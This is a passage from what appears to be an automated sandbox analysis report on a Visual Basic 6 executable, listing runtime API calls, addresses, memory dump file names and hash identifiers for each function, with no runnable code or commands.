                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E978
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E981
                                                                                    • __vbaFreeStr.MSVBVM60(0041E9B5,?,?,?,00000000,Function_000032B6), ref: 0041E9AE
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041E9C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkComputerNameOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3892761589-0
                                                                                    • Opcode ID: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                    • Instruction ID: ddd52465c9ed4945c744d66910b811b9efcc79ef8180f597879438901a225856
                                                                                    • Opcode Fuzzy Hash: 315b392100c3462b08fcc4b1466ef19faf135d5fa9e097fc028cf97c92f61f1c
                                                                                    • Instruction Fuzzy Hash: 3531ECB5900149EFDB04EFA4DE4DBDEBBB8EB08701F108169E502B62A0DB755A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041570B
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00415719
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00415724
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041572D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1195834276-0
                                                                                    • Opcode ID: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                    • Instruction ID: 3bfd6651098160e42727f528c249f020de588879550cabcf3784d8fb116c8987
                                                                                    • Opcode Fuzzy Hash: bdf559da7314384f190e296f1ac055395a927108a04aa4df9cc8b86ae63a2552
                                                                                    • Instruction Fuzzy Hash: 1A0121B1D00605EFCB04EFB8D94AAEF7BB8EB44700F50466AF515E3290D73899468B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157BB
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157C9
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157D4
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,004032B6,00000000), ref: 004157DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorFreeSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1195834276-0
                                                                                    • Opcode ID: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                    • Instruction ID: 842bb0dc7b1d712480adeb04c5aa04fa762cb34ee96fa383d986c0466198cab9
                                                                                    • Opcode Fuzzy Hash: 83a8390b36b60fd734ea8c397f5819164e647e3c1d550d8bc1d44403629c9ffe
                                                                                    • Instruction Fuzzy Hash: 580152B1C00605DFCB00EFA8C94AAAF7BB8EB44700F50422AE511E3290D73859428B95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: #100
                                                                                    • String ID:
                                                                                    • API String ID: 1341478452-0
                                                                                    • Opcode ID: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                    • Instruction ID: 87d76072f60c1bc7f33af001724cdeb9567c685050ecb4be3524b273619080b8
                                                                                    • Opcode Fuzzy Hash: 11ea1c51b5a51515781a12991443ec066bd5106ecc6824d3c35676c3fc523bff
                                                                                    • Instruction Fuzzy Hash: 805185A680E7C15FC70387704D756557FB0AE23209B2E86EBC4C0DB1E3E2AD590AD766
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00416205
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00416230
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00416251
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00416271
                                                                                    • __vbaStrMove.MSVBVM60(0042C028), ref: 00416284
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004162D2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00416315
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00407CCC,00000000,00000001), ref: 00416350
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00416357
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000), ref: 0041635F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00416366
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000), ref: 0041636B
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00406F58,00000000,00000001), ref: 0041639A
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$Move$System$BoundsFreeGenerateUnlock
                                                                                    • String ID: d/m/yy h:m$system32\drivers\$system\
                                                                                    • API String ID: 4109330638-2282477228
                                                                                    • Opcode ID: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                    • Instruction ID: d0160703c745c1a143ef53c75ac1b7ca3f1d84f450066f924383876c7bbd0f3b
                                                                                    • Opcode Fuzzy Hash: 161571ce6ef3f7305a61f0ace64fbd078412d40ef427ac6ccd469720dc9a114e
                                                                                    • Instruction Fuzzy Hash: 93336D71A00219DFCB14DFA4DD84AEEB7B9FF48300F10816AE50AE7265DB749985CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042317F
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00423187
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042318B
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000101,?,00000000), ref: 004231B6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 004231C9
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 004231D5
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 004231EE
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00406E0C,?,?,00000160,00000100,?,00000000), ref: 00423227
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,?,00000000), ref: 0042323A
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000), ref: 00423246
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00406E0C,?,?,?,00000000), ref: 0042325F
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 00423270
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0042327C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000278,?,00000000), ref: 004232A2
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004232B1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,0000011C,?,00000000), ref: 004232D1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000084,?,00000000), ref: 0042331C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,0000008C,?,00000000), ref: 00423364
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000154,?,00000000), ref: 00423389
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,00000050,?,00000000), ref: 004233AD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,660E6C4A,004098D4,000000E0,?,00000000), ref: 004233E3
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,?,00000000,00000000,00000003,?,00000000), ref: 00423409
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000264,?,00000000), ref: 0042343E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 00423450
                                                                                    • __vbaRedim.MSVBVM60(00000180,00000004,?,00000008,00000002,00000003,00000000,?,00000000,?,00000000), ref: 00423478
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042348C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 004234BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042354C
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 00423574
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 00423592
                                                                                    • __vbaI2I4.MSVBVM60(?,?), ref: 004235B0
                                                                                    • #537.MSVBVM60(00000000,?), ref: 004235F6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423600
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00423603
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042360D
                                                                                    • #537.MSVBVM60(00000000,00000000), ref: 00423612
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042361C
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0042361F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423629
                                                                                    • #537.MSVBVM60(00000000,00000000), ref: 0042362E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423638
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0042363B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00423645
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 0042366C
                                                                                    • #537.MSVBVM60(?,?), ref: 00423695
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042369F
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236A2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236AC
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004236B7
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236C1
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236C4
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236CE
                                                                                    • #537.MSVBVM60(?,00000000), ref: 004236D9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236E3
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 004236E6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004236F0
                                                                                    • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00423717
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423774
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237C7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237DF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004237FF
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00423812
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423856
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00423888
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098D4,00000284), ref: 0042390C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00423950
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00423985
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00423994
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004239A7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004239CD
                                                                                    • __vbaStrCmp.MSVBVM60(0040A0E4,00000000), ref: 004239DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$#537$BoundsGenerate$Free$#606CheckHresult$_adj_fdiv_m64$AnsiCopy$ListSystem$File$#581#648BstrCloseDestructExitOpenOverflowProcPut3RedimUnicode
                                                                                    • String ID: $&H68$&HA8$x.@
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FAA5
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FABA
                                                                                    • #631.MSVBVM60(00000000,?,0000000A), ref: 0041FAE5
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001,0000000A), ref: 0041FAF2
                                                                                    • __vbaFreeVar.MSVBVM60(?,-00000001,0000000A), ref: 0041FAFE
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB11
                                                                                    • #570.MSVBVM60(00000000), ref: 0041FB1F
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C250,00000000), ref: 0041FB3F
                                                                                    • __vbaPut3.MSVBVM60(00000000,0042C254,00000000), ref: 0041FB50
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0041FB60
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 0041FB69
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB8E
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FB9D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,-00000001,0000000A), ref: 0041FBC1
                                                                                    • __vbaUI1I2.MSVBVM60(?,-00000001,0000000A), ref: 0041FBCC
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FC36
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCEA
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FCFB
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000FEE), ref: 0041FD43
                                                                                    • __vbaUI1I2.MSVBVM60(00000FEE), ref: 0041FD55
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FD76
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FDAA
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FDD8
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FE02
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FE41
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 0041FE4D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(-00000001,00000FED,00000000), ref: 0041FEAB
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000000), ref: 0041FEE3
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041FFDF
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420025
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0042003A
                                                                                    • __vbaPut3.MSVBVM60(00000004,0042C24C,00000000), ref: 0042004A
                                                                                    • __vbaFileSeek.MSVBVM60(-0042C250,00000000), ref: 00420070
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00420095
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004200A2
                                                                                    • __vbaFreeStr.MSVBVM60(00420142), ref: 00420123
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042013B
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00420159
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$Free$FileMovePut3$Bstr$#631$#516$#648CloseCopyOpenSeek$#570#594#709Construct2DestructExitListOverflowProcUbound
                                                                                    • String ID:
                                                                                    • API String ID: 380034392-0
                                                                                    • Opcode ID: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                    • Instruction ID: 84537c48718631c5227d11dd853d148d1c88204475b6f264efbcfc593f9f6461
                                                                                    • Opcode Fuzzy Hash: db36c0f1733d6b656f6f0f21110ea2e54cb1fc60724d0d05d8831d20435b8e45
                                                                                    • Instruction Fuzzy Hash: 2332CE35A00255CFCB249FA4E8857EDBBB1FF48340F54417AE405A7362DB7898C6CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004172EC
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 0041731F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00417340
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417349
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417370
                                                                                    • #631.MSVBVM60(00000000,-00000003,0000000A,00000000), ref: 00417399
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 004173C9
                                                                                    • #631.MSVBVM60(00000000,-00000002,0000000A,00000000), ref: 004173F1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00417414
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417420
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Error$#631System$#616ListUnlock$BoundsBstrGenerate$CopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1595817071-0
                                                                                    • Opcode ID: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                    • Instruction ID: 643dac4b4df38dfcdabcb7d24b6f5cff0a220186fca35a0c0bc2019b66c0cc28
                                                                                    • Opcode Fuzzy Hash: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                    • Instruction Fuzzy Hash: 78E119B0E002189BDB14DFA5DD84AEEBBB9FF48300F50856EE50AE7250DB745986CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 00417261
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 00417294
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004172B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004172BE
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
